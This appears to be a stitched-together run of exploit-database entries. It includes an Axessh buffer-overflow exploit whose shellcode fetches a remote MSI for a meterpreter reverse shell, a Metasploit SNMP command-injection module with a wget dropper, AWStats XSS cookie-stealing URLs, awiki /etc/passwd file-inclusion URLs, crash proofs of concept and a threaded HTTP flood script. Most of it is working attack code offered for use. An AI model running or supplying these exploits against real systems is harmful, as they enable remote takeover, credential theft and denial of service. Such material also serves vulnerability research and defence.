# Software Link: http://www.labf.com/download/axessh.exe
# Version v4.2
# Tested on: Windows 7 SP1 EN (x86)
# Reference: https://www.exploit-db.com/exploits/46858
# TO RUN:
# 0. Setup a multi/handler listener
# 1. Run python script
# 2. Copy contents of axssh.txt
# 3. Open telnet_S.exe
# 4. Select Details >> Settings >> Logging
# 5. Select Log all Session Output radio button
# 6. Paste the contents in Log file name
# 7. Press "OK"
# 8. Press "OK"
# EIP offset: 214
# 0x050e3f04 : push esp # ret | ascii {PAGE_EXECUTE_READ} [ctl3d32.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v2.31.000 (C:\Windows\system32\ctl3d32.dll)
#77da395c - Address of LoadLibraryA() for Windows 7 SPI x86
#777db16f - Address of system() for Windows 7 SPI x86
#77da214f - Address of ExitProcess for Windows 7 SPI x86
# Shellcode Reference: https://www.exploit-db.com/shellcodes/46281
# Payload command command: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.163 LPORT=4444 EXITFUNC=seh -f msi > /var/www/html/ms.msi
# When the payload runs, it floods the system with Command windows and sends back a meterpreter shell. The shell does not die even if the user closes the application.
filename = "axssh.txt"
msiScode = "\x31\xc0\x66\xb8\x72\x74\x50\x68\x6d\x73\x76\x63\x54\xbb\x5c\x39\xda\x77\xff\xd3\x89\xc5\x31\xc0\x50\x68\x20\x2f\x71\x6e\x68\x2e\x6d\x73\x69\x68\x33\x2f\x6d\x73\x68\x36\x2e\x31\x36\x68\x38\x2e\x31\x32\x68\x32\x2e\x31\x36\x68\x2f\x2f\x31\x39\x68\x74\x74\x70\x3a\x68\x2f\x69\x20\x68\x68\x78\x65\x63\x20\x68\x6d\x73\x69\x65\x89\xe7\x57\xb8\x6f\xb1\x7d\x77\xff\xd0\x31\xc0\x50\xb8\x4f\x21\xda\x77"
evilString = "\x90" * 110 + msiScode + "\x90" * 6 + "\x04\x3f\x0e\x05" + "\x90"*4 + "\x89\xE0\x83\xE8\x7F\x89\xC4\xEB\x81" + "\x90" * 800
file = open(filename,'w')
file.write(evilString)
file.close()
#Exploit Title: Axessh 4.2 'Log file name' - Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-14
#Vendor Homepage: http://www.labf.com
#Software Link: http://www.labf.com/download/axessh.exe
#Tested Version: 4.2
#Tested on: Windows 7 Service Pack 1 x32
#Steps to produce the crash:
#1.- Run python code: Axessh_4.2.py
#2.- Open Axess.txt and copy content to clipboard
#3.- Open Axessh.exe
#4.- In "Telnet Connect Host" select "Details>>" > "Settings"
#5.- Select "Logging" and enable "Log all sessions output"
#6.- In "Log file name" paste Clipboard
#7.- Select "OK" and in "Telnet Connect Host" select "Ok"
#8.- Crashed
cod = "\x41" * 500
f = open('Axess.txt', 'w')
f.write(cod)
f.close()
source: https://www.securityfocus.com/bid/49749/info
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AWStats 7.0 and 6.95 are vulnerable; other versions may also be affected.
http://example.com/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://example.com/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10
[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]
Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax 0x1060 4192
ecx 0x1 1
edx 0x41414141 1094795585
ebx 0x880ff4 8916980
esp 0xbffff0f0 0xbffff0f0
ebp 0xbffff118 0xbffff118
esi 0x41414141 1094795585
edi 0x8062920 134621472
eip 0x74ee65 0x74ee65 <fgets+53>
eflags 0x210216 [ PF AF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SNMPClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "AwindInc SNMP Service Command Injection",
'Description' => %q{
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
A valid SNMP read-write community is required to exploit this vulnerability.
The following devices are known to be affected by this issue:
* Crestron Airmedia AM-100 <= version 1.5.0.4
* Crestron Airmedia AM-101 <= version 2.5.0.12
* Awind WiPG-1600w <= version 2.0.1.8
* Awind WiPG-2000d <= version 2.1.6.2
* Barco wePresent 2000 <= version 2.1.5.7
* Newline Trucast 2 <= version 2.1.0.5
* Newline Trucast 3 <= version 2.1.3.7
},
'License' => MSF_LICENSE,
'Author' =>
[
'Quentin Kaiser <kaiserquentin[at]gmail.com>'
],
'References' =>
[
['CVE', '2017-16709'],
['URL', 'https://github.com/QKaiser/awind-research'],
['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
],
'DisclosureDate' => '2019-03-27',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'CmdStagerFlavor' => %w[wget],
'Type' => :linux_dropper
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))
register_options(
[
OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
])
end
def check
begin
connect_snmp
sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
print_status("Target system is #{sys_description}")
# AM-100 and AM-101 considered EOL, no fix so no need to check version.
model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
case model
when 'AM-100', 'AM-101'
return CheckCode::Vulnerable
else
# TODO: insert description check for other vulnerable models (that I don't have)
# In the meantime, we return 'safe'.
return CheckCode::Safe
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
Exploit::CheckCode::Unknown
end
def inject_payload(cmd)
begin
connect_snmp
varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
resp = snmp.set(varbind)
if resp.error_status == :noError
print_status("Injection successful")
else
print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
end
def trigger
begin
connect_snmp
varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
resp = snmp.set(varbind)
if resp.error_status == :noError
print_status("Trigger successful")
else
print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
def execute_command(cmd, opts = {})
# The payload must start with a valid FTP URI otherwise the injection point is not reached
cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
# When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
# We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
# keep our reverse shell opened :)
cmd << "$(pkill -f /etc/reboot.sh)"
# the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
cmd << "A" * (255-cmd.length)
# we inject our payload in camFWUpgradeFTPURL
print_status("Injecting payload")
inject_payload(cmd)
# we trigger the firmware download via FTP, which will end up calling this
# "/bin/getRemoteURL.sh %s %s %s %d"
print_status("Triggering call")
trigger
end
end
source: https://www.securityfocus.com/bid/49187/info
awiki is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
awiki 20100125 is vulnerable; other versions may also be affected.
http://www.example.com/awiki/index.php?page=/etc/passwd
http://www.example.com/awiki/index.php?action=Editar+el+Motor&scriptname=/etc/passwd
# Exploit Title: AWebServer GhostBuilding 18 - Denial of Service (DoS)
# Date: 28/12/2021
# Exploit Author: Andres Ramos [Invertebrado]
# Vendor Homepage: http://sylkat-tools.rf.gd/awebserver.htm
# Software Link: https://play.google.com/store/apps/details?id=com.sylkat.apache&hl=en
# Version: AWebServer GhostBuilding 18
# Tested on: Android
#!/usr/bin/python3
# *********************************************************************************
# * Author: Andres Ramos [Invertebrado] *
# * AWebServer GhostBuilding 18 - Remote Denial of Service (DoS) & System Crash *
# *********************************************************************************
import signal
import requests
from pwn import *
#Colors
class colors():
GREEN = "\033[0;32m\033[1m"
END = "\033[0m"
RED = "\033[0;31m\033[1m"
BLUE = "\033[0;34m\033[1m"
YELLOW = "\033[0;33m\033[1m"
PURPLE = "\033[0;35m\033[1m"
TURQUOISE = "\033[0;36m\033[1m"
GRAY = "\033[0;37m\033[1m"
exit = False
def def_handler(sig, frame):
print(colors.RED + "\n[!] Exiting..." + colors.END)
exit = True
sys.exit(0)
if threading.activeCount() > 1:
os.system("tput cnorm")
os._exit(getattr(os, "_exitcode", 0))
else:
os.system("tput cnorm")
sys.exit(getattr(os, "_exitcode", 0))
signal.signal(signal.SIGINT, def_handler)
if len(sys.argv) < 3:
print(colors.RED + "\n[!] Usage: " + colors.YELLOW + "{} ".format(sys.argv[0]) + colors.RED + "<" + colors.BLUE + "URL" + colors.RED + "> <" + colors.BLUE + "THREADS" + colors.RED +">" + colors.END)
sys.exit(1)
url = sys.argv[1]
Tr = sys.argv[2]
def http():
counter = 0
p1 = log.progress(colors.TURQUOISE + "Requests" + colors.END)
while True:
r = requests.get(url)
r = requests.get(url + "/mysqladmin")
counter += 2
p1.status(colors.YELLOW + "({}) ({}/mysqladmin)".format(url, url) + colors.GRAY + " = " + colors.GREEN + "[{}]".format(counter) + colors.END)
if exit:
break
if __name__ == '__main__':
threads = []
try:
for i in range(0, int(Tr)):
t = threading.Thread(target=http)
threads.append(t)
sys.stderr = open("/dev/null", "w")
for x in threads:
x.start()
for x in threads:
x.join()
except Exception as e:
log.failure(str(e))
sys.exit(1)